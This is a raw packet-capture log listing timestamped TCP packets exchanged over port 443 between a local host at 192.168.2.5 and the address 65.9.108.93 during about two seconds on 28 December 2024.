Dec 28, 2024 22:21:26.373306990 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.373344898 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.375044107 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.375093937 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.378812075 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.378834009 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.378890038 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.378915071 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.378933907 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.379671097 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.384471893 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.384686947 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.384710073 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.384753942 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.384772062 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.384803057 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.384820938 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.387161970 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.389864922 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.389931917 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.390049934 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.390069008 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.390137911 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.395711899 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.395735025 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.395776987 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.395801067 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.395819902 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.395843983 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.557427883 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.557461977 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.557507038 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.557526112 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.557553053 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.557569027 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.563429117 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.563460112 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.563492060 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.563502073 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.563532114 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.563548088 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.568495035 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.568531990 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.568562984 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.568573952 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.568602085 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.568619967 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.574429035 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.574462891 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.574506044 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.574516058 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.574543953 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.574565887 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.580281019 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.580301046 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.580349922 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.580360889 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.580400944 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.585793018 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.585813046 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.585882902 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.585894108 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.585932970 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.591732979 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.591753006 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.591809988 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.591820002 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.591856956 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.597095966 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.597115993 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.597168922 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.597179890 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.597219944 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.759118080 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.759146929 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.759185076 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.759198904 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.759232998 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.759246111 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.764393091 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.764415979 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.764465094 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.764471054 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.764513016 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.764527082 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.770194054 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.770210981 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.770255089 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.770262003 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.770299911 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.770311117 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.776026011 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.776041985 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.776082039 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.776087046 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.776123047 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.776135921 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.781227112 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.781245947 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.781311989 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.781318903 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.781366110 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.787517071 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.787535906 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.787601948 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.787607908 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.787643909 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.787658930 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.790158987 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.792695999 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.792711020 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.792756081 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.792761087 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.792790890 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.792808056 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.798598051 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.798618078 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.798662901 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.798670053 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.798701048 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.798706055 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.834108114 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.960292101 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.960314989 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.960407019 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.960407972 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.960417986 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.960505962 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.966223955 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.966239929 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.966288090 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.966296911 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.966325045 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.966353893 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.971393108 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.971409082 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.971760035 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.971760035 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.971769094 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.971812963 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.977209091 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.977229118 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.977273941 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.977288008 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.977338076 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.983134031 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.983149052 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.983216047 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.983225107 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.983267069 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.983267069 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.988662958 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.988678932 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.988735914 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.988743067 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.988778114 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.988787889 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.993844032 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.993863106 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.993908882 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.993926048 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.993952036 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.993983030 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.999742985 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.999758005 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.999808073 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.999815941 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:26.999861956 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:26.999861956 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.161405087 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.161432028 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.161535978 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.161556959 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.161670923 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.167303085 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.167324066 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.167536974 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.167543888 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.167629957 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.172522068 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.172537088 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.172621965 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.172629118 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.172686100 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.178448915 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.178463936 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.178610086 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.178617001 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.178739071 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.184262037 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.184278965 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.184401035 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.184408903 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.184478045 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.189903975 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.189920902 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.189994097 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.190000057 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.190058947 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.195710897 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.195727110 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.195811033 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.195816994 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.195879936 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.357928991 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.357966900 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.358061075 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.358071089 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.358114004 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.358114004 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.362766981 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.362783909 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.362854958 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.362862110 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.362993002 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.368666887 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.368702888 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.368792057 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.368792057 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.368798971 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.368915081 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.373776913 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.373794079 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.373857975 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.373863935 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.373935938 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.379770994 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.379787922 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.379993916 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.380001068 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.380075932 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.380440950 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.385973930 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.385988951 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.386040926 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.386048079 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.386141062 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.391148090 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.391165972 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.391271114 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.391271114 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.391278028 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.397138119 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.397152901 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.397219896 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.397219896 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.397228003 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.545290947 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.559634924 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.559647083 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.559683084 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.559698105 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.559842110 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.559842110 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.559855938 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.559909105 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.564686060 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.564693928 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.564724922 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.564776897 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.564785004 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.564822912 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.564822912 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.569873095 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.569890022 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.569993973 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.570000887 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.570069075 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.575817108 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.575831890 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.575895071 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.575901985 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.575965881 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.581617117 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.581634045 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.581710100 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.581716061 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.581763983 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.587214947 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.587232113 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.587284088 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.587290049 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.587328911 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.587342978 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.593029022 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.593045950 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.593132973 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.593138933 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.593213081 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.598220110 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.598234892 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.598294020 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.598299980 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.598339081 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.598339081 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.760466099 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.760484934 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.760567904 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.760582924 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.760612965 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.760629892 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.765984058 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.766001940 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.766076088 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.766086102 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.766123056 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.766123056 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.768507957 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.768584013 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.773742914 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.773760080 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.773894072 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.773900986 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.774013996 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.779649019 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.779669046 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.779719114 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.779726028 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.779800892 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.785461903 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.785480022 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.785562038 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.785568953 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.785717964 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.791145086 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.791162014 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.791239977 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.791245937 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.791294098 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.796904087 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.796921968 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.796984911 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.796991110 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.797039032 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.802119970 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.802138090 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.802196026 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.802201986 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:27.802248001 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:27.964128017 CET	443	49849	65.9.108.93	192.168.2.5
